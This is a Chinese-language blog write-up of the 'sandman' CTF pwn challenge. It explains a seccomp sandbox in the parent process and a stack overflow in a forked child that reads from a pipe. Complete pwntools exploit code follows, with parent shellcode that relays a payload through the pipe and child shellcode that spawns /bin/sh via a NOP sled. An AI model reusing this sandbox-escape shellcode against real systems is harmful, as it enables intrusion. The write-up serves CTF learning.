sandman_nc_2016

最新推荐文章于 2024-05-12 08:52:10 发布
最新推荐文章于 2024-05-12 08:52:10 发布
阅读量141 收藏 1
点赞数 1
分类专栏: linux_pwn 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/azraelxuemo/article/details/128034107
版权

非常好的题目

设计到的知识点

seccomp

他再fork之后执行的seccomp,所以可以看到子进程是没有沙箱保护的
在这里插入图片描述
他这里只允许了read 0号系统调用,write 1号系统调用,还有剩下两个是跟error和exit处理有关
在这里插入图片描述
大概的漏洞大家可以看明白,父进程可以执行任意代码,但有沙箱
子进程栈溢出,没沙箱,但是输入是从3pipe创建的描述符输入的,但我们正常是无法使用3描述符的,所以必须要shellcode里面写这部分

pipe

pipe这个函数会返回两个文件描述符,pipedes[0]负责read,pipedes[1]负责write,这里就是3负责read,4负责write,如果我们想要利用shellcode往子进程写内容,最开始我也是想直接read(0,buf,len),write(3,buf,len),但是会失败,我们换成read(0,buf,len),write(4,buf,len)就成功了
在这里插入图片描述

payload

父进程shellcode执行部分

buf=0x602200
ret_addr=buf+0x234
shellcode=f"""
mov rdi,0;
mov rdx,{len(payload)};#payload主要是子进程的shellcode
mov rsi,{buf}
mov rax,0;
syscall;#read(0,buf,len)
mov rdi,{ret_addr}
mov rax,rsp;
sub rax,0x200;
mov qword ptr [rdi],rax#这里就是把最后溢出的ret地址改成栈地址,这里-0x200就是可以根据父进程和子进程大概偏移估算,反正我们也是栈喷
mov rdi,4;
mov rax,1;
syscall;#write(4,buf,len)
start:
nop
jmp start#写个循环防止退出
"""
shellcode=asm(shellcode)
s(p8(len(shellcode)))
sleep(0.5)
s(shellcode)
sleep(0.5)
s(payload)#这里就是子进程的payload
it()

子进程payload

def convert_str_asmencode(content: str):
    out = ""
    for i in content:
        out = hex(ord(i))[2:] + out
    out = "0x" + out
    return out
sh=f"""
mov rax,{convert_str_asmencode("//bin/sh")}#防止有]x00
mov rdx,rsp;
sub dx,0x1008#这个随便往地址写入/bin/sh
mov qword ptr [rdx],rax
add dl,0x8
xor rsi,rsi
mov qword ptr [rdx],rsi;#加上\x00
sub dl,0x8
mov rdi,rdx;
xor rdx,rdx
xor rax,rax
mov al,0x3b
syscall
"""
sh=asm(sh)

payload_final=b"http://"+b"\x90"*(0x228-len(sh))+sh+p64(ret_addr)#这个ret_addr无所谓,反正也要被我们覆盖掉
payload=b"\x0e"+p32(len(payload_final))+payload_final

allpayload

def convert_str_asmencode(content: str):
    out = ""
    for i in content:
        out = hex(ord(i))[2:] + out
    out = "0x" + out
    return out

buf=0x602200
ret_addr=buf+0x234
sh=f"""
mov rax,{convert_str_asmencode("//bin/sh")}
mov rdx,rsp;
sub dx,0x1008
mov qword ptr [rdx],rax
add dl,0x8
xor rsi,rsi
mov qword ptr [rdx],rsi;
sub dl,0x8
mov rdi,rdx;
xor rdx,rdx
xor rax,rax
mov al,0x3b
syscall
"""
sh=asm(sh)

payload_final=b"http://"+b"\x90"*(0x228-len(sh))+sh+p64(ret_addr)
payload=b"\x0e"+p32(len(payload_final))+payload_final
shellcode=f"""
mov rdi,0;
mov rdx,{len(payload)};
mov rsi,{buf}
mov rax,0;
syscall;
mov rdi,{ret_addr}
mov rax,rsp;
sub rax,0x200;
mov qword ptr [rdi],rax
mov rdi,4;
mov rax,1;
syscall;
start:
nop
jmp start
"""
shellcode=asm(shellcode)
s(p8(len(shellcode)))
sleep(0.5)
s(shellcode)
sleep(0.5)
s(payload)
it()

在这里插入图片描述

azraelxuemo
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PowerManagerService分析之KEEP_SCREEN_ON
yunyun_9027的博客
04-16 1009
一、核心变量和方法简介 PowerManagerService核心逻辑在updatePowerStateLocked()中,贴出主要代码: private void updatePowerStateLocked() { if (!mSystemReady || mDirty == 0) { return; } i...
Sandman Mail-开源
05-01
具有PHP后端的基于Flex的IMAP客户端。
Python3 sandman2 模块
极客点儿
08-23 760
一个 Python 语言的数据库适配库,可以为各种数据库自动生成 RESTful 接口 GitHub 地址:https://github.com/jeffknupp/sandman2
Python sandman2库报错module ‘time‘ has no attribute ‘clock‘ 或 无法将“sandman2”项识别为 cmdlet、函数、脚本文件或可运行程序的名称
qq_24077201的博客
07-08 336
在Windows环境下安装sandman2 可能会在pip install sanman2后出现 sandman2 : 无法将“sandman2”项识别为 cmdlet、函数、脚本文件或可运行程序的名称。 请检查名称的拼写,如果包括路径,请确保路径正确,然后再试一次 这时候你需要看一下在pip时是否有类似这样的警告 WARNING: The script sandman2ctl.exe is installed in 'C:\Users\xxx\AppData\Roaming\Python\Pyt
Android 性能测试_Monkey 实践
dey87696的博客
12-10 189
转载地址:https://testerhome.com/topics/3502 参考资料:1. Monkey测试策略:https://testerhome.com/topics/597 2. Android Monkey测试详细介绍:http://www.jikexueyuan.com/course/1619.html 测试步骤 思路1. 目前做的是银行AP...
Unfiltered Audio Sandman PRO Mac(延迟效果器插件)破解版
weixin_44075686的博客
02-13 910
Plugin Alliance Unfiltered Audio Sandman PRO Mac 破解教程 原文链接请点击这里 Plugin Alliance Unfiltered Audio Sandman PRO Mac破解版镜像包下载完成后打开,双击【Unfiltered Audio Sandman Pro.pkg】开始安装。 欢迎安装Unfiltered Audio Sandman ...
sandboxie沙盒@便携安装的启动SandMan@windows多开软件程序
xuchaoxin1375的博客
02-19 1260
Note:关于脚本创建和快捷方式创建是基本操作,这里不赘述,另见它文(或者问AI大模型)sandboxie默认有一个沙盒,名称为Defaultbox。初次启动,会让你执行简单的配置,包括授权以及沙盒位置的确认。可以配置相关的函数,别名等,也同样可以创建为脚本或快捷方式。,选择一个沙盒(比如Defaultbox),选择。随后可以看到工具栏的托盘区域出现。对于便携版,进入安装目录,执行。与cmd略有不同,在前面加一个。文件夹中的可执行文件有很多,,这就和文档中的介绍接轨。
java 扫描仪_Java调用扫描仪2
weixin_42584507的博客
02-20 1810
最近碰到的问题,客户端调用本地的扫描仪,将扫描的文件上传。使用到的技术:applet,twain,HttpClient当然也碰到很多问题,因为在这周之前我都不知道什么是applet一.Applet操作本地资源基于安全方面的原因,applet是不允许操作本地资源的。但是java提供了相应的为jar包签名的机制来提升applet的权限。相信很多人都碰到过这种对话框:让用户来决定是否给applet提升权...
pixhawk MP地面站 NTF_LED参数相关
Sandman06的博客
02-14 1433
NeoPixel — Copter documentation 这一部分里面的NTF相关参数,对应MP地面站里的这几项 不是给外接WS2812设置的。 我折腾了一下午,再更改了其他一些参数后,导致飞控上那个最大的多彩LED指示灯不亮, 刷了半天固件都不行,后来发现是参数设置把LED关了的缘故,这点官方有点坑人了,要注意。 WS2812可能还是要在servo_xxxxxx参数中调整了 ...
Sandman.MP3
weixin_34218579的博客
05-22 44
http://www.beatallica.org/2004ep/Beatallica - 02 - Sandman.MP3http://www.beatallica.org/2004ep/Beatallica%20-%2006%20-%20Hey%20Dude.MP3 转载于:https://blog.51cto.com/axlrose/1292535
sandman2-master.rar
10-09
sandman2-master.rar
Sandman一个为深夜开发者构建的应用程序
08-09
根据您的唤醒时间和睡眠算法,Sandman计算出您睡觉的最佳时间。 它将在整个夜晚通知您最佳关机时间,并开始睡觉,并提供一个按钮来做到这一点。
桑德曼(Sandman):一个深夜开发人员构建的应用程序
02-04
桑德曼考虑深夜开发人员构建的应用程序轻量级的bash版本可以在找到桑德曼(Sandman)会提醒您休息一下,明天您可以随时恢复工作。 睡眠周期是90分钟的时间,您的身体会经历各种睡眠阶段-一直到深层REM睡眠-然后又...
sandman2:自动为您的旧数据库生成RESTful API服务。 无需代码!
02-04
sandman2从您现有的数据库自动生成RESTful API服务,而无需您编写代码。 只需将sandman2指向您的数据库,添加盐调味,然后sandman2 ,具有超媒体支持的完全RESTful API服务就开始运行,准备接受HTTP请求。 这是一...
linux下的进程通信
最新发布
羊羊羊
05-12 670
进程通信详解、管道、命名管道、匿名管道...
Linux】文件内容相关的命令,补充:管道符
yannan20190313的博客
05-07 1112
Linux】文件内容相关的命令,补充:管道符
Linux 第二十三章
一怀明月的博客
05-08 946
回顾文件 fopen() fwrite fputs >文件名 追加重定向 认识系统接口 open linux中常见的函数传参数 umask write read 语言和系统的区别 文件描述符
Linux查看Oracle数据库的环境变量
早安,朝气蓬勃的你
05-09 453
脚本通常用于交互式shell会话中,它们会提示用户选择要使用的Oracle实例(SID)。这些脚本不会直接显示当前设置的环境变量值,但你可以通过查看它们的代码来了解它们是如何工作的。在Linux上查看Oracle数据库的环境变量,通常涉及检查当前shell会话中已设置的环境变量。的shell脚本,用于设置Oracle的环境变量。你可以运行这些脚本来设置环境变量,但也可以使用。来查看它们的内容,以了解它们是如何设置环境变量的。(可能包含Oracle二进制文件的路径)等。这些文件通常包含设置环境变量的命令。
如何在 Ubuntu 22.04 或 20.04 Linux 上安装MobaXterm
u010879745的博客
05-08 1134
如何在 Ubuntu 22.04 或 20.04 Linux 上安装MobaXterm

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值